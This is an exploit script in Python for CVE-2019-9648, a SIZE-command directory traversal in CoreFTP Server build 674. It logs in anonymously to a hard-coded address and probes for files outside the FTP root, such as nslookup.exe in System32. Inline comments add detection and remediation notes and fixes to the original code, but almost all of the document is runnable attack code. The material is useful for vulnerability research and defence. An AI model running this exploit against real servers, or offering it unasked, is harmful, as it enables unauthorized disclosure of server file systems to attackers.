# Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674 - SIZE Directory Traversal
# Google Dork: N/A
# Date: 4/27/2019
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.coreftp.com
# Software Link: http://www.coreftp.com/server/index.html
# Version: Firmware: CoreFTP Server FTP / SFTP Server v2 - Build 674
# Tested on: Windows 7
# CVE : CVE-2019-9648
#!/usr/bin/python
import socket
import sys
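# ---------------------------------------------------------------------------
# Settings for the check.
# ---------------------------------------------------------------------------
# Name of the file whose existence is probed on the server.
file_to_look_for = "nslookup.exe"
# Drive prefix. The leading space is intentional: the value is appended directly
# to the literal 'SIZE', so the space separates the FTP verb from its argument.
local_disk_drive = " C:"
# Relative path that climbs out of the FTP root and into the target directory.
# Backslashes are escaped explicitly; the original relied on invalid escape
# sequences ("\.", "\W", "\S"), which newer Python versions warn about.
path_traversal = "\\..\\..\\..\\..\\..\\Windows\\System32\\"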
# Write the ASCII-art banner to stdout at start-up. The trailing "\n" is the
# newline that a print of the same string would append.
sys.stdout.write("""
###### # ############### ###### ##### ###########
# # # # # # ## # ## # # # # # # ### #
# # # # # # # # # # # # # # ### #
# # # ##### ########### # ####### ########### ######## #####
## ## # # # # # # # # ####### # #
# # # # # ## ## # # # # # ### #
##### ######## ####### ### ########## ##### ##### # #####
#######
# ## ###### ##### #####
##### ### # #
##### ## ## ### # #
# ## ######## # #
####### # #
####### ## ############ #
# # ###### # ##
### ###### ##### ##### ###### ### # # # #### ####### ## # ##
### ## # # # ### ## ## # # ## ### # ## #
### ## # # # ###### ################### # # ##
### ###### # # ### ## # ## ## ### # ## #
### # ## # # ## ### # # #### ## ### # ##
## #### # # # ###### ########## ## ###### ## # ##
######
# # ## ## ####### ##
# ##### # ######
######## # ## ## ## ##
# # ###### ## # ## ###### ##
#### # ## ## ## ##
# # ## ## ####### ###### ######
""" + "\n")
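# Exposure check for CVE-2019-9648: log in anonymously and send an FTP SIZE
# request whose argument climbs out of the FTP root. A successful SIZE reply has
# the form "213 <size>" (RFC 3659), so a numeric second field for a path outside
# the root shows that the server resolved the traversal and discloses whether
# the file exists and how large it is.
#
# Defender notes: the request is visible in FTP command logs as a SIZE argument
# containing "..\" sequences. Remediation is a vendor build that fixes
# CVE-2019-9648; disabling anonymous login where it is not required removes the
# unauthenticated path used here.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bound every blocking call so an unresponsive server cannot hang the check.
s.settimeout(10)
try:
    s.connect(('192.168.0.4', 21))
    s.recv(1024)  # whatever the server sends on connect (normally its greeting)
    s.send(b'USER anonymous\r\n')
    s.recv(1024)
    s.send(b'PASS anonymous\r\n')
    s.recv(1024)
    # The original always performs a second read after PASS. If the server put
    # its whole login reply in the first read, there is nothing left to receive,
    # so a timeout here means "no more data", not a failure.
    try:
        s.recv(1024)
    except socket.timeout:
        pass

    size_request = 'SIZE' + local_disk_drive + path_traversal + file_to_look_for + '\r\n'
    if not isinstance(size_request, bytes):
        # Text string (Python 3): sockets need bytes.
        size_request = size_request.encode('utf-8')
    s.send(size_request)
    result = s.recv(2048)

    # Reply is "<code> <rest>"; only the second field is inspected. The length
    # check avoids an IndexError on an empty or single-word reply.
    splitoutput = result.strip().split(b' ')
    if len(splitoutput) > 1 and splitoutput[1].isdigit():
        # isdigit() guarantees ASCII digits, so the decode cannot fail.
        print("The file " + file_to_look_for + " exist on the remote server. Here is the filesize:" + splitoutput[1].decode('ascii'))
    else:
        print("The file " + file_to_look_for + " does not exist on the remote server or one of the variables declared is incorrect.")
    s.send(b'QUIT\r\n')
finally:
    # The original wrote `s.close` without parentheses, which never closed the
    # socket; close it on every path, including errors.
    s.close()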